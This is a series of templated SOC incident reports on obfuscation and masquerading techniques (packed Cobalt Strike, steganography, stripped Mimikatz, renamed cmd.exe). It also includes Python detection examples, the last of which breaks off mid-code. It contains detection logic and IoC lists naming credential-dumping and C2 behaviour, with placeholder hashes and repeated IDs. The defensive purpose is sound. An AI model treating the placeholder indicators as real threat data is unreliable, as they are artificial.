Closure Rationale: Firewall restored; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-08 15:30 EST
148. T1027.001 – Binary Packing (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-BINARY-PACK-1027-7842
Alert Time: 2024-03-08 11:30:22 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “Packed Binary Detected – Multiple Packers Used”
MITRE ATT&CK: T1027.001 – Obfuscated Files or Information: Binary Packing
Alert Details:
File Analysis Report:
File Name: update_installer.exe
File Size: 1.2 MB (unpacked size: 4.8 MB)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to engineering@company.com
Submission Time: 11:15 EST
Packing Analysis:
Detected packer: UPX (Ultimate Packer for Executables) – version 3.96
Detected packer: Themida (commercial protector) – secondary layer
Entropy: 7.98 (very high, indicates packed/encrypted)
Packing ratio: 75% compressed (1.2 MB vs 4.8 MB unpacked)
Unpacking Process (FortiSandbox emulation):
Layer 1: UPX unpacked (custom UPX with modified header)
Layer 2: Themida anti-debugging checks, decrypted final payload
Final payload: Cobalt Strike beacon (SHA256: b2c3d4e5…)
Behavior After Unpacking:
Connected to 185.143.221[.]89:443
Injected into explorer.exe
Established persistence via scheduled task
Detection Logic:
Multiple packers detected (UPX + Themida)
High entropy (indicates encrypted/compressed)
Unpacked payload identified as Cobalt Strike
Pattern matches advanced malware obfuscation
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed packed binary (UPX+Themida) |
| 2. Email Investigation | Find source email | Proofpoint, Exchange | Email to engineering@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block C2 IP and domain | Palo Alto, Cisco Umbrella | 185.143.221[.]89 blocked |
| 6. Threat Hunting | Check for similar packed files | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-188
Summary: T1027.001 – Packed Malware (UPX+Themida) Delivered via Email
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1027, binary-packing, upx, themida, fortisandbox, phishing
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Packed Binary Detected – Multiple Packers Used”.
File: update_installer.exe (email attachment).
Target: Engineering Department.
Time: 2024-03-08 11:30 EST.
Technique: MITRE ATT&CK T1027.001 – Obfuscated Files or Information: Binary Packing.
2. Technical Analysis:
Attack Chain:
11:10 – Email sent from “vendor@software-update[.]net”
11:11 – Email delivered to engineering@company.com
11:12 – FortiSandbox analyzes attachment (inline)
11:15 – Analysis begins
11:20 – Packing detected
11:25 – Unpacking successful, payload identified
11:30 – Alert triggers
11:31 – Email quarantined
Packing Analysis:
Layer 1 (UPX): Standard packer, but with modified header to evade signature detection
Layer 2 (Themida): Commercial protector with anti-debugging, anti-sandbox, and encryption
Entropy: 7.98 (maximum is 8.0) – clear indicator of packing
Unpacked Size: 4.8 MB (original PE)
Final Payload:
Type: Cobalt Strike beacon
SHA256: b2c3d4e5…
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Email Details:
Sender: vendor@software-update[.]net
Subject: “Critical Security Update – Install Immediately”
Attachment: update_installer.exe
3. Investigation Findings:
Timeline:
11:10 – Email sent
11:11 – Email delivered
11:12-11:30 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– update_installer.exe (SHA256: a1b2c3d4…)
– Unpacked Cobalt Strike (SHA256: b2c3d4e5…)
Network:
– C2: 185.143.221[.]89:443
Packers:
– UPX (modified)
– Themida
Email:
– Sender: vendor@software-update[.]net
– Subject: “Critical Security Update – Install Immediately”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hashes to blocklists.
User Notification:
Engineering team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for update-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending packed malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for high-entropy/packed files.
8. Conclusion:
A sophisticated malware sample used multiple packers (UPX and Themida) to obfuscate its payload and evade signature-based detection. FortiSandbox detected the packing and unpacked the file, revealing a Cobalt Strike beacon. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-08 12:30 EST
149. T1027.002 – Software Packing (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SOFTWARE-PACK-1027-7842
Alert Time: 2024-03-08 16:30:45 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Packed Process Detected – Obfuscated Code in Memory”
MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing
Alert Details:
Detection: Process with packed/obfuscated code detected in memory
Host: DEV-WS-089 (Development Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Process: C:\Users\rpatel\Downloads\dev_tool.exe (PID: 4789)
Time: 16:25 EST
Memory Analysis:
Process memory has high entropy (7.9)
Sections: .text, .data, .rdata are packed/encrypted
Expected for unpacked PE: entropy ~5.0-6.0
Packer signature: ASPack (detected)
Behavioral Analysis:
Process allocated memory with write and execute permissions (RWX)
Wrote decrypted code to new memory region
Transferred execution to decrypted code
Connected to 185.143.221[.]89:443
Detection Logic:
High entropy in process memory (indicates packed code)
RWX memory allocation (unusual for legitimate software)
Self-modifying code (decryption at runtime)
Pattern matches packed malware
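Both packing reports above (the FortiSandbox file analysis of update_installer.exe, entropy 7.98 against a maximum of 8.0, and the Falcon memory analysis of dev_tool.exe, entropy 7.9 against an expected 5.0-6.0 for unpacked PE code) rest on the same Shannon entropy measurement. The following is an added example showing that measurement per section and per window; it is not the vendors' code, and the two byte buffers are constructed stand-ins (a limited-alphabet buffer for plain code, uniformly random bytes for a compressed or encrypted section), not the real samples.

```python
"""Byte-entropy checks behind packed-binary detection.

Added example, not part of the original reports; the section contents are
constructed (random.Random with a fixed seed), not the analysed files.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of information per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, chunk: int = 1024):
    """Entropy per fixed-size window, so a plaintext unpacking stub and the
    packed body it precedes show up as separate regions instead of one average."""
    return [round(shannon_entropy(data[i:i + chunk]), 2) for i in range(0, len(data), chunk)]


def section_report(sections: dict, threshold: float = 7.0) -> dict:
    """Per-section (entropy, flagged) pairs.  7.0 bits/byte is a commonly used
    cut-off between code/data (~5-6 in the reports) and compressed or
    encrypted content (7.9-7.98 in the reports); calibrate it on a clean baseline."""
    out = {}
    for name, data in sections.items():
        h = shannon_entropy(data)
        out[name] = (round(h, 2), h > threshold)
    return out


def looks_packed(sections: dict, threshold: float = 7.0) -> bool:
    """True when any section exceeds the threshold (UPX0/UPX1 are the usual UPX section names)."""
    return any(flag for _, flag in section_report(sections, threshold).values())


def constructed_sections() -> dict:
    """Constructed sample: a 64-symbol buffer (entropy close to 6.0, comparable to
    plain x86 code) and a uniformly random buffer (close to 8.0, like a packed body)."""
    rng = random.Random(2024)
    plain = bytes(rng.choices(range(64), k=8192))
    packed = bytes(rng.choices(range(256), k=8192))
    return {".text": plain, "UPX1": packed}


if __name__ == "__main__":
    secs = constructed_sections()
    print(section_report(secs))                       # {'.text': (5.99, False), 'UPX1': (7.98, True)}
    print("packed:", looks_packed(secs))
    print(chunk_entropies(secs[".text"] + secs["UPX1"], chunk=4096))
```

On a real PE the sections would come from the section table rather than a dict; the point of the per-window view is that a packed file is not uniformly high-entropy: the unpacking stub (and, in the memory case, the region the process decrypted into) sits next to the high-entropy body, which is why the Falcon alert pairs the entropy figure with the RWX allocation and the jump into freshly written memory.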
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed packed process (ASPack) |
| 2. Process Investigation | Analyze memory | CrowdStrike Falcon Memory | Unpacked Cobalt Strike beacon |
| 3. User Interview | Contact rpatel | Teams, Phone | User downloaded “tool” from forum; unaware |
| 4. Immediate Action | Terminate process | CrowdStrike | Process killed |
| 5. Host Isolation | Isolate DEV-WS-089 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-189
Summary: T1027.002 – Packed Malware (ASPack) Executed on Development Workstation
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1027, software-packing, aspack, crowdstrike, user-error
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Packed Process Detected – Obfuscated Code in Memory”.
Host: DEV-WS-089 (Development, user rpatel).
Process: C:\Users\rpatel\Downloads\dev_tool.exe.
Packer: ASPack.
Time: 2024-03-08 16:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing.
2. Technical Analysis:
Attack Chain:
16:00 – User downloads “developer tool” from forum
16:05 – Executes dev_tool.exe
16:10 – Packed process runs, unpacks in memory
16:15 – Unpacked payload (Cobalt Strike) connects to C2
16:25 – CrowdStrike detects
Packing Details:
Packer: ASPack (popular executable packer)
Entropy: 7.9 in process memory (highly packed)
Unpacking: Process allocated RWX memory, decrypted payload, jumped to it
Unpacked Payload:
Type: Cobalt Strike beacon
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
User Intent:
User thought it was a legitimate tool
Unaware of malware
3. Investigation Findings:
Timeline:
16:00 – Tool downloaded
16:05 – Executed
16:10-16:15 – Unpacking and C2
16:25 – Alert
16:27 – SOC investigates
16:28 – Process terminated
16:29 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Downloads\dev_tool.exe (SHA256: a1b2c3d4…)
Process Memory:
– High entropy (7.9)
– RWX allocation
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated dev_tool.exe process.
Isolated host.
Disabled rpatel account.
Reset password.
Blocked C2 IP.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
User Education:
Counseled on downloading untrusted software.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted software.
Contributing Factors:
No application control.
User unaware of packing risks.
6. Business Impact:
Operational Impact: Development workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware terminated.
Account secured.
User educated.
Technical Controls Enhanced:
Enabled application control.
Enhanced monitoring for packed processes.
8. Conclusion:
A user downloaded a packed executable that unpacked in memory and connected to C2. CrowdStrike detected the packed process and enabled rapid termination.
Closure Rationale: Malware terminated; account secured; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-08 17:30 EST
150. T1027.003 – Steganography (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-STEGO-1027-7842
Alert Time: 2024-03-08 10:30:22 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “Steganography Detected – Hidden Payload in Image”
MITRE ATT&CK: T1027.003 – Obfuscated Files or Information: Steganography
Alert Details:
File Analysis Report:
File Name: conference_photo.jpg
File Size: 2.3 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to marketing@company.com
Submission Time: 10:15 EST
Steganography Analysis:
File appears to be a normal JPG image (conference photo)
LSB (Least Significant Bit) analysis revealed hidden data
Hidden data extracted: 256 KB executable (payload.exe)
Extraction method: LSB steganography (1 bit per pixel)
Extracted Payload:
File: payload.exe
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Type: Cobalt Strike loader
Image Analysis:
Original image: legitimate conference photo from public source
Hidden data embedded in pixels (imperceptible to human eye)
MD5 of image before embedding: 7a8b9c0d…
MD5 after embedding: a1b2c3d4… (hash differs, image looks identical)
Detection Logic:
Statistical analysis showed anomalous LSB patterns
Hidden executable detected
Image entropy higher than a normal JPG
Pattern matches steganography for malware delivery
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed steganography in image |
| 2. Email Investigation | Find source email | Proofpoint, Exchange | Email to marketing@company.com from “conference@event.org” |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user opened image | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block C2 IP and hashes | Palo Alto, Cisco Umbrella | 185.143.221[.]89 blocked; hashes added |
| 6. Threat Hunting | Check for similar images | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-190
Summary: T1027.003 – Steganography: Malware Hidden in Conference Photo
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1027, steganography, image-hidden, fortisandbox, phishing
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Steganography Detected – Hidden Payload in Image”.
File: conference_photo.jpg (email attachment).
Target: Marketing Department.
Time: 2024-03-08 10:30 EST.
Technique: MITRE ATT&CK T1027.003 – Obfuscated Files or Information: Steganography.
2. Technical Analysis:
Attack Chain:
10:10 – Email sent from “conference@event.org”
10:11 – Email delivered to marketing@company.com
10:12 – FortiSandbox analyzes attachment (inline)
10:15 – Analysis begins
10:20 – Steganography detected
10:25 – Hidden payload extracted
10:30 – Alert triggers
10:31 – Email quarantined
Steganography Details:
Method: LSB (Least Significant Bit) encoding
Cover Image: Legitimate conference photo (public source)
Hidden Data: 256 KB executable (payload.exe)
Extraction: 1 bit per pixel, 2.3 MB image yields ~256 KB hidden data
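The "anomalous LSB patterns" in the detection logic and the 1-bit-per-pixel figure in the steganography details above can be illustrated with a small LSB-plane check. This is an added example, not FortiSandbox's analysis: the cover image is a constructed 64x64 grayscale gradient held in a flat list (no image library needed), and the "stego" copy simply has every LSB overwritten with a random bit, which is what embedding a compressed or encrypted payload at one bit per pixel leaves behind in the plane.

```python
"""LSB-plane randomness check for steganography triage.

Added example, not part of the original report. Cover and stego images are
constructed; the test statistic is compressibility of the packed LSB plane.
"""
import random
import zlib

WIDTH, HEIGHT = 64, 64


def cover_image():
    """Constructed smooth gradient standing in for a photo: neighbours differ by at most 1."""
    return [((x + y) // 2) & 0xFF for y in range(HEIGHT) for x in range(WIDTH)]


def randomize_lsbs(pixels, seed=7):
    """Stand-in for a stego image: every pixel's LSB replaced by a random bit."""
    rng = random.Random(seed)
    return [(p & ~1) | rng.getrandbits(1) for p in pixels]


def capacity_bytes(pixels):
    """Payload capacity at 1 bit per pixel (the report's image hid a 256 KB executable)."""
    return len(pixels) // 8


def lsb_plane(pixels):
    """Pack the LSB of each pixel in scan order, 8 pixels per byte."""
    out = bytearray()
    usable = len(pixels) - len(pixels) % 8
    for i in range(0, usable, 8):
        byte = 0
        for p in pixels[i:i + 8]:
            byte = (byte << 1) | (p & 1)
        out.append(byte)
    return bytes(out)


def lsb_compress_ratio(pixels):
    """zlib output size divided by LSB-plane size.  The LSB plane of smooth
    image content is correlated with the pixel values and compresses; the
    plane carrying a compressed or encrypted payload behaves like random
    bits and does not (ratio at or above 1.0)."""
    plane = lsb_plane(pixels)
    return len(zlib.compress(plane, 9)) / len(plane)


def lsb_looks_random(pixels, threshold=0.9):
    """Flag for analyst review when the LSB plane is essentially incompressible."""
    return lsb_compress_ratio(pixels) > threshold


if __name__ == "__main__":
    cover = cover_image()
    stego = randomize_lsbs(cover)
    print("capacity:", capacity_bytes(cover), "bytes")
    print("cover ratio:", round(lsb_compress_ratio(cover), 3), lsb_looks_random(cover))
    print("stego ratio:", round(lsb_compress_ratio(stego), 3), lsb_looks_random(stego))
```

Real photographs carry sensor noise in the LSB plane, so on real input the clean ratio is higher than this gradient gives and the threshold has to be calibrated on a corpus of known-clean images; the compressibility figure is a triage signal that sends the file to deeper analysis (the extraction and payload identification the sandbox performed), not a verdict by itself.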
Hidden Payload:
File: payload.exe
SHA256: b2c3d4e5…
Type: Cobalt Strike loader
C2: 185.143.221[.]89:443
Email Details:
Sender: conference@event.org (spoofed)
Subject: “Photos from Industry Conference 2024”
Attachment: conference_photo.jpg
3. Investigation Findings:
Timeline:
10:10 – Email sent
10:11 – Email delivered
10:12-10:30 – FortiSandbox analysis
10:30 – Alert triggers
10:31 – Email quarantined
10:32 – SOC investigates
10:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– conference_photo.jpg (SHA256: a1b2c3d4…)
– payload.exe (extracted, SHA256: b2c3d4e5…)
Network:
– C2: 185.143.221[.]89:443
Email:
– Sender: conference@event.org
– Subject: “Photos from Industry Conference 2024”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hashes to blocklists.
User Notification:
Marketing team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Enhanced filtering for image attachments.
Added steganography detection to email gateway.
5. Root Cause Analysis:
Primary Cause: External attacker using steganography to hide malware in image.
Contributing Factors:
Image attachments allowed (now scrutinized).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Enhanced FortiSandbox steganography detection.
Created alert for images with embedded data.
Added LSB analysis to email security.
8. Conclusion:
An attacker used steganography to hide a Cobalt Strike loader inside a seemingly innocent conference photo. FortiSandbox detected the hidden payload and enabled blocking before any user could open the image.
Closure Rationale: Malware blocked; IOCs added; email policy enhanced.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-08 11:30 EST
End of Batch 30
Batch 31: Defense Evasion & Masquerading Incident Reports
151. T1027.005 – Indicator Removal from Tools (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-INDICATOR-REMOVAL-1027-7842
Alert Time: 2024-03-09 09:30:15 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Known Malicious Tool with Altered Indicators Detected”
MITRE ATT&CK: T1027.005 – Obfuscated Files or Information: Indicator Removal from Tools
Alert Details:
Detection: Mimikatz executable with modified PE characteristics (stripped of original indicators)
Host: ENG-WS-045 (Engineering Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
File: C:\Users\rpatel\Downloads\legit_tool.exe
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
File Size: 845 KB (original Mimikatz is 1.2 MB)
Analysis:
File is a variant of Mimikatz (credential dumping tool)
Original PE metadata removed:
No version information
No digital signature
No original filename
PE timestamp: 1970-01-01 (nulled)
Import Address Table (IAT) obfuscated
Strings: many Mimikatz-specific strings removed or encrypted
Behavioral detection: attempts to access LSASS process
Detection Logic:
Behavioral pattern matches Mimikatz (OpenProcess on lsass.exe)
File hash not in known threat intel (new variant)
PE characteristics stripped (indicator removal)
Machine learning (ML) score: 92/100 for malware
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed Mimikatz-like behavior with stripped indicators |
| 2. File Analysis | Submit to sandbox | CrowdStrike Falcon Sandbox | Unpacked and identified as Mimikatz 2.2.0 variant |
| 3. Process Investigation | Identify source of file | CrowdStrike | Downloaded from hacking forum via Chrome |
| 4. User Interview | Contact rpatel | Teams, Phone | User downloaded “security testing tool” – unauthorized |
| 5. Immediate Action | Delete file and kill process | CrowdStrike Live Response | File removed; no LSASS access occurred |
| 6. User Remediation | User counseling | Manager, HR | Policy violation documented |
Jira Incident Report
Ticket: SOC-2024-191
Summary: T1027.005 – Stripped Mimikatz Variant (Indicator Removal)
Status: RESOLVED
Resolution: POLICY VIOLATION – Tool Removed
Priority: P3 – LOW
Labels: T1027, indicator-removal, mimikatz, crowdstrike, policy-violation
Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Known Malicious Tool with Altered Indicators Detected”.
Host: ENG-WS-045 (Engineering, user rpatel).
File: C:\Users\rpatel\Downloads\legit_tool.exe (stripped Mimikatz).
Time: 2024-03-09 09:30 EST.
Technique: MITRE ATT&CK T1027.005 – Obfuscated Files or Information: Indicator Removal from Tools.
2. Technical Analysis:
File Analysis:
Original Mimikatz: 1.2 MB, with version info, signed by “Gentil Kiwi” (often self-signed)
This Variant: 845 KB, stripped of all metadata
No version information
No original filename
PE timestamp set to 0 (1970-01-01)
Import Address Table obfuscated (dynamic resolution)
Many strings encrypted (only decrypted at runtime)
Behavioral Analysis:
Attempted to open process lsass.exe (PID: 568) with PROCESS_ALL_ACCESS
Attempted to read memory of lsass.exe (blocked by PPL – Protected Process Light)
No credentials dumped
User Intent:
User downloaded “legit_tool.exe” from a hacking forum for “learning purposes”
Unaware that it was a stripped version of Mimikatz
No malicious intent against company
Policy Violation:
Unauthorized use of credential dumping tool
Violation of acceptable use policy
3. Investigation Findings:
Timeline:
09:15 – File downloaded
09:20 – User executed file
09:22 – LSASS access attempt
09:30 – CrowdStrike alert
09:32 – SOC investigates
09:35 – File deleted, user interviewed
Indicators of Compromise (IoCs):
File:
– C:\Users\rpatel\Downloads\legit_tool.exe (SHA256: a1b2c3d4…)
Behavior:
– OpenProcess on lsass.exe
– Stripped PE metadata
4. Containment Actions:
Immediate Actions:
Deleted the file.
Terminated any associated processes.
No LSASS compromise.
User Remediation:
User counseled on policy.
Required to complete security training.
5. Root Cause Analysis:
Primary Cause: User curiosity about security tools led to downloading unauthorized software.
Contributing Factors:
No application control.
User unaware of policy.
6. Business Impact:
Operational Impact: None.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Tool removed.
User educated.
Technical Controls Enhanced:
Implemented application control to block known hacking tools.
Enhanced monitoring for LSASS access attempts.
8. Conclusion:
A user downloaded a stripped version of Mimikatz that evaded signature-based detection by removing indicators. CrowdStrike’s behavioral detection identified the LSASS access attempt and enabled removal. No credentials were compromised.
Closure Rationale: Tool removed; user educated; policy violation documented.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 10:30 EST
152. T1036.003 – Rename System Utilities (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-RENAME-UTIL-1036-7842
Alert Time: 2024-03-09 14:15:33 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: “Suspicious Process Name – System Utility Renamed”
MITRE ATT&CK: T1036.003 – Masquerading: Rename System Utilities
Alert Details:
Event ID: 1 (Process Creation)
Time: 14:10 EST
Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Process Tree:
explorer.exe (PID: 2341)
svchost.exe (PID: 4789)
Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Command Line: “C:\Users\bturner\AppData\Local\Temp\svchost.exe” -k netsvcs
Original Name: cmd.exe (renamed to svchost.exe)
File Details:
File: C:\Users\bturner\AppData\Local\Temp\svchost.exe
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
File is actually cmd.exe (renamed)
Verified by comparing hash with known cmd.exe hash (after extraction)
Detection Logic:
Process named “svchost.exe” running from Temp folder (anomalous)
File hash matches cmd.exe (system utility)
Process name does not match actual executable (renamed)
Parent process is explorer.exe (unusual for svchost.exe)
Pattern matches masquerading (rename system utility to evade detection)
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon event | Splunk, Sysmon Logs | Confirmed renamed cmd.exe as svchost.exe |
| 2. Process Investigation | Identify source of renamed file | CrowdStrike Falcon | File dropped by malicious script from phishing email |
| 3. User Interview | Contact bturner | Teams, Phone | User opened “invoice.doc” with macro |
| 4. Immediate Action | Terminate process, delete file | CrowdStrike | Process killed; file removed |
| 5. Email Investigation | Find source email | Proofpoint, Exchange | Email quarantined; attachment malicious |
| 6. Account Remediation | Reset bturner password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-192
Summary: T1036.003 – Renamed cmd.exe to svchost.exe for Masquerading
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1036, rename-utilities, masquerading, sysmon, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1.
Alert: “Suspicious Process Name – System Utility Renamed”.
Host: FIN-WS-078 (Finance, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\svchost.exe (actually cmd.exe).
Time: 2024-03-09 14:15 EST.
Technique: MITRE ATT&CK T1036.003 – Masquerading: Rename System Utilities.
2. Technical Analysis:
Attack Chain:
13:45 – User opens phishing email with “invoice.doc”
13:46 – Macro executes, downloads script
13:50 – Script copies cmd.exe to Temp as svchost.exe
14:00 – Script executes renamed cmd.exe with parameters
14:10 – Process runs; Sysmon detects
Masquerading Technique:
Original: C:\Windows\System32\cmd.exe
Renamed: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Purpose: To appear as a legitimate svchost.exe process
Command: Used to launch PowerShell (encoded) for C2
Malicious Activity:
The renamed cmd.exe launched PowerShell with encoded command
PowerShell attempted to connect to 185.143.221[.]89:443 (blocked)
No further compromise
User Status:
User unaware; clicked attachment
3. Investigation Findings:
Timeline:
13:45 – Phishing email opened
13:46-13:50 – Malware drops renamed cmd.exe
14:00 – Execution
14:10 – Sysmon alert
14:12 – SOC investigates
14:13 – Process terminated
14:14 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\svchost.exe (renamed cmd.exe)
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated process.
Deleted renamed executable.
Isolated host temporarily.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block process creations originating from PSExec and WMI”.
Enhanced monitoring for renamed system utilities.
8. Conclusion:
An attacker used a renamed cmd.exe (masquerading as svchost.exe) to evade detection. Sysmon identified the process name mismatch and enabled rapid termination.
Closure Rationale: Process terminated; file removed; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 15:30 EST
153. T1036.005 – Match Legitimate Name or Location (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-MATCH-NAME-LOC-1036-7842
Alert Time: 2024-03-09 11:30:22 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Process with System Name Running from User-Writable Path”
MITRE ATT&CK: T1036.005 – Masquerading: Match Legitimate Name or Location
Alert Details:
Detection: Process named “svchost.exe” running from C:\Users\Public\
Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (Karen Wilson, HR)
Process: C:\Users\Public\svchost.exe (PID: 4789)
Command Line: C:\Users\Public\svchost.exe -k rpcss
Time: 11:25 EST
File Details:
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Digital Signature: None (legitimate svchost.exe is signed by Microsoft)
File Size: 312 KB (legitimate svchost.exe is ~45 KB)
Creation Time: 11:20 EST
Detection Logic:
Process name matches legitimate system binary (svchost.exe)
Running from user-writable path (C:\Users\Public) – anomalous
No digital signature (expected signed)
Parent process: explorer.exe (unusual for svchost.exe)
Pattern matches masquerading (malware posing as svchost.exe)
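Detection logic for both masquerading alerts (the renamed cmd.exe in the previous report and this svchost.exe in C:\Users\Public), written as an added Python example that is not part of the original reports: it evaluates the Sysmon Event ID 1 fields Image, OriginalFileName and ParentImage, plus the signer status an EDR supplies, against constructed sample events. SYSTEM_BINARIES, EXPECTED_PARENTS and the sample events are assumptions, not data taken from the incidents.

```python
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# System binaries that should only ever run from the Windows directory tree (assumed baseline).
SYSTEM_BINARIES = {"svchost.exe", "cmd.exe", "lsass.exe", "csrss.exe",
                   "services.exe", "winlogon.exe", "explorer.exe"}
# Directories (lower-cased, no trailing separator) those binaries legitimately live in.
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
# Expected parents from normal Windows process lineage; a starting baseline, not exhaustive.
EXPECTED_PARENTS = {"svchost.exe": {"services.exe"}, "lsass.exe": {"wininit.exe"},
                    "csrss.exe": {"smss.exe"}, "winlogon.exe": {"smss.exe"}}


@dataclass(frozen=True)
class ProcessEvent:
    """Fields taken from a Sysmon Event ID 1 (process create) record."""
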